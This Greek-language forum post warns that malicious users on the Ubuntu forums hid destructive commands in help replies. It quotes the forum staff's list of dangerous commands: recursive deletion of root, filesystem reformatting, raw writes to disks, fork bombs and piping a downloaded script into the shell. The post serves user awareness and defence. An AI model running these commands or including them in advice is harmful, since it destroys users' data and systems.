Κακόβουλοι χρήστες στo Ubuntu Forum

Είναι δωρεάν, είναι σταθερό, είναι γρήγορο.. ας το γνωρίσουμε και λίγο καλύτερα..

Συντονιστές: Super-Moderators, Software & Hardware Moderators

Απάντηση
Άβαταρ μέλους
FUBAR
Δημοσιεύσεις: 255
Εγγραφή: 12 Οκτ 2007 15:03
Τοποθεσία: 41°7' 16°51' (Earth)

Κακόβουλοι χρήστες στo Ubuntu Forum

Δημοσίευση από FUBAR » 29 Νοέμ 2007 05:07

Το επίσημο forum της Ubuntu βάλετε από κακόβουλους χρήστες. Σε τυχαία αναζήτηση πρίν κανα μήνα είχα πετύχει ένα τέτοιο κακόβουλο post βοηθείας, όπου κάποιο από τα τακτικά μάλιστα μέλη του forum, έδινε λάθος και επικίνδυνες εντολές σε χρήστη που είχε πρόβλημα με τον σκληρό του. Δεν είχα δώσει ιδιαίτερη σημασία παρόλο που μου είχε κάνει εντύπωση.
Σήμερα τυχαία είδα την επίσημη ανακοίνωση που ουσιαστικά επιβεβαιώνει αυτό που είχα δει και που δυστυχώς δεν ήταν η μόνη περίπτωση.
Υπάρχει λοιπόν μια μερίδα μελών του forum που εσκεμμένα (δια λόγους άγνωστους) σε post για support δίνουν ως συμβουλή/λύση σε χρήστες που αντιμετωπίζουν κάποιο πρόβλημα, να εκτελέσουν εντολές που θα δημιουργήσουν πρόβλημα στο σύστημα τους. Αυτές οι εντολές ήταν πάντα κρυμμένες ανάμεσα σε "καλόβουλες" εντολές ή μέσα σε κάποιο shell script και στόχευαν κυρίως αρχάριους χρήστες.
Επειδή μάλιστα το forum της Ubuntu αποτελεί μία από τις μεγαλύτερες κοινότητες και χρησιμοποιείτε και από άτομα που χρησιμοποιούν κάποιο άλλο distro καλό είναι να διαδοθεί η είδηση ώστε να προφυλαχθούν όσο το δυνατό περισσότεροι χρήστες.
Παραθέτω την λίστα με τις επικίνδυνες εντολές όπως παρουσιάζεται στην επίσημη ανακοίνωση
UbuntuForums Staff έγραψε: Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute

Κώδικας: Επιλογή όλων

rm -rf /
rm -rf .
rm -rf *
Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

Κώδικας: Επιλογή όλων

mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

Κώδικας: Επιλογή όλων

any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)

Κώδικας: Επιλογή όλων

:(){:|:&};:
In Perl

Κώδικας: Επιλογή όλων

fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust

Κώδικας: Επιλογή όλων

wget http://some_place/some_file
sh ./some_file
or
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).
Καλό είναι πάντως να μην υποπέσουμε σε φαινόμενα ψηφιακής τρομολαγνείας απλώς όταν κάποιος σας πει να εκτελέσετε εντολές που δεν τις γνωρίζεται απλώς googlάρετε την εντολή.

Απάντηση

Επιστροφή στο “Linux Guide”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 0 επισκέπτες